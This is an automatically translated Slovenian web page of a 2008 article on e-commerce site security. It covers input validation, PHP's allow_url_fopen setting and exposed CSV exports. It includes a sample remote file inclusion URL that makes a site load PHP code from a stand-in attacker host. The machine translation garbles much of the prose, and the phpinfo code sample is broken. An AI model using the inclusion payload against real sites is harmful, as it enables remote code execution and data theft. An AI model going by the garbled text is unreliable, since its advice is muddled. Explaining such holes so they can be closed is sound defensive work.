The following content has been automatically translated by close 
E-Commerce Security - priklopom Security Holes | E-Commerce člen
Člen Sphere Logo

E-Commerce Security - priklopom Security Holes

Avtor Expert By: Paul Roberts | člen Povzetek
Word Count: 520 besede | Ogledov: 149 view (s)
Varnost v e-poslovanje spletne strani je treba upoštevati pri razvoju večjih e-poslovanje spletne strani ali programske opreme. Projekta je treba zavedati vseh varnostnih vidikov pri načrtovanju mesta. Z e-trgovina postaja vse bolj običajna teh dneh, število varnostnih napadov je vsekakor narašča. Paranoja je zdrava stvar za razvijalce e-business stran, moramo ohraniti do vrat z varnostnimi vprašanji, in vodijo naša ušesa in oči odprte. Čeprav so naslednje vrzeli resno, če je prisoten po vrzeli so lahko določene.

Spodaj je nekaj varnostnih pomislekov, ki se vključi pri razvoju mesta. Ta člen ne zajema e-kraje v trgovinah, si oglejte moj poseben člen o tem.

Uporabnik input - vsak vnos, pa naj bo vnos količina, iskanje izdelka, ki vstopajo imena itd, je treba potrditi v sumljivih znakov. Če to ni storjeno, je mogoče vstopiti "?>", zapiranje koncu oznake za PHP in izvajanje del kode PHP.

To je daleč varnejše omogočiti številke in črke az (črkami vštet) in 0-9 in nič drugega, kot pa da seznam vseh znakov, ki ne bi smel biti tam. Potrjevanje skript mora pomikanjem vsak lik enega po enega. To je treba doseči z uporabo strežnika na strani potrditve, ne Javascript. Uporaba strani strežnika vstopnega potrjevanje je nujno ohraniti nezaželenih znakov

Obstaja še en velik pri izvajanju PHP kodo. Če uporabljate PHP obstaja nastavitev, imenovano allow_url_fopen, ki omogoča odpiranje datotek iz PHP skript. Ta nastavitev mora biti izklopljen, razen če je to nujno potrebno.

Zamislite si, imaš PHP skript tako za določen glave in noge, ter za dostop do vaše spletne strani, ki bi jih v vrsto http://www.mysite.com/index.php?page=page2. Vse kar potrebujete, je zlonamerno uporabnik teči scenarij s spremembo teh parametrov, ki jih vnesete v "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" z nekaj PHP kode v datoteko "hacker.txt". Lahko bi se kaj zgodilo, PHP files branje, črta, pomembnih informacij ukraden.

Če niste prepričani, če je ta nastavitev vklopljena ali izklopljena, vas prosimo, kopirajte naslednjo kodo PHP v besedilno datoteko in jo prenesite na vaš spletni strežnik:

phpinfo ();
?>

Ko odprete svoj skript na spletni strežnik, morate priti po nastavitev allow_url_fopen po konfiguraciji.

Računalnik uporabnika, v normalnih okoliščinah ne more najti vrednosti te nastavitve.

Bodite previdni, izvoženih podatkov, kot so naročila, izdelke v CSV in mySQL datotek. Če se ta izvozi podatkov iz skripta in se hrani na spletni strežnik pod skupnim imenom datoteke, tj. http://www.mysite.com/admin/output_tables.csv. To je samo res problem, ko izvažajo podatki, prebiva v datoteko v imeniku, ki je javno dostopen. Obstaja dva načina, da se prepreči ta varnostna vrzel - prvič je izhodna datoteka zadaj zaščitena geslo imenik, po drugi strani so podatki, ki se nahajajo znotraj obrazec textarea HTML element na scenarij. Storeowner lahko nato kopirate te podatke iz textfile in ustvarite novo datoteko na svojem računalniku in ga prilepite informacij tukaj.

Vse kar potrebujete, je heker, da bi našli to ime datoteke s preverjanjem iz e-commerce software je demo spletne strani in iščejo isto ime datoteke na pravi strani.
Paul Roberts

O Avtor / Author Bio

Paul Roberts
Vodim podjetje za razvoj programske opreme, specializirano za E-Commerce, Search Engine Optimization, in Print Ocena software pozval robo Design Solutions. Jaz tudi razviti New Zealand E-Commerce rešitve in programske opreme pod imenom robo Design.

Article Source: http://www.sl.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 149 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
Kako vztrajati vaš računalnik Secure
Kako Preverite varnostne nastavitve v operacijskem sistemu Windows Vista

More "Commerce" Povezani članki

Spodaj so več člankov, povezanih z zgoraj članek iz "Commerce" article kategorijo.

Ljudje se zanimajo za zgoraj članek "E-Commerce Security - priklopom varnostne luknje", so prav tako zanima, povezanih členov, navedenih spodaj:

Running e-poslovanje podjetja ne gre samo za vzdrževanje vaše spletne strani gor ter tekmovanje v teku. Stranke zanašajo na svoje sposobnosti, da jim služijo po telefonu, faksu, e-pošte, ali na drug način, in zahteva, da vse vaše sisteme, ki se delajo, da bi lahko izpolnili zahteve strank.
Samo nekaj dni nazaj sem bil ob klepetu z mojim prijateljem. Bil je praznovanje svojega otroka 1. rojstni dan in je za vožnjo med rodno v Kerala in Chennai, njegovo delovno mesto. On in njegova boljša polovica potoval med temi kraji najmanj 4-krat v zadnjih mesec dni.
Če ste bili delaš e-poslovanje za vsako količino časa, bi moral vedeti, da obstaja več kot pristni scamers ponudniki veleprodajnih storitev dropship directory. V svetu e-poslovanja, Salehoo in Worldwide Brands sta uglednih ponudniki storitev, ki so pridobili popularnost v zadnjih nekaj letih.
Če ste kdaj bili online trgovec, ste verjetno že slišali za Salehoo ali celo uporabila v vašo korist. Če ste se šele začenjajo z vašega podjetja, boste morda zamenjali z mešano Salehoo preglede tam. Sedaj pa nam bo pogledati, kaj Salehoo je res vse okoli in storitve, ki jih ponujajo številne, ki so ponavadi spregledati.
Koliko ljudi veš, da so kupili nekaj online? Če, kot sem jaz kar nekaj, zato je e-trgovanjem svetu novi spletni nakupovalni center. Ampak, kdo vodi te spletne trgovine na drobno? Ljudje tako kot ti in jaz, to 'zakaj to dejavnost doživlja razcvet in bo še naprej bum sedaj in tudi v prihodnosti.
Če ste velik oboževalec najnovejših elektronskih izdelkov, vas bo morda zamikalo z idejo o tekočih svoj elektronike poslovanja na spletu. Ni tako težko, da bi začeli, ko ste vzeli v celoti izkoristijo pravico, padec ladijskega prometa elektronike storitev in obstaja veliko, za katerimi lahko izbirate.
Si kdaj šel v svojo lokalno trgovino udobje in se sprašujem, kaj bi to bilo všeč, če si lasti to? Želite biti dober lastnik, se bodo ljudje kot si ti? No ta članek vam bo pokazal prednosti ima v lasti svoj online trgovina na drobno, ali splošno znana kot e-commerce, ki se razlikuje od dejansko lokalna trgovinica.
Člen Directory Home Vse kategorije Internet in e-poslovanje E-Commerce

Can't find what you're looking for? Preizkusite Google Search!
Copyright © 2005 -- , ki ga Larry Lim, Singapur - člen Search Engine Directory na ArticleSphere.com ™
Vse pravice pridržane. Vse blagovne znamke in Servicemarks so last posameznih lastnikov.

Afrikanščina Albanščina Arabski Beloruščina Bolgarščina Katalonščina Kitajščina (poenostavljena) Kitajščina (tradicionalna) Hrvaščina Češčina Danščina Nemščina Angleščina Estonščina Tagalogščina Finščina Francoščina Galicijščina Grški Hebrejščina Hindijščina Madžarščina Islandščina Indonezijščina Irščina Italiano Japonščina Korejščina Letonščina Litovščina Makedonščina Malajščina Malteščina Nizozemščina Norveščina Perzijščina Poljščina Portugalščina Romunščina Ruščina Srbščina Slovaščina Slovenski Španščina Svahili Švedščina Tajski Turščina Ukrajinščina Vietnamščina Valižanščina Jidiš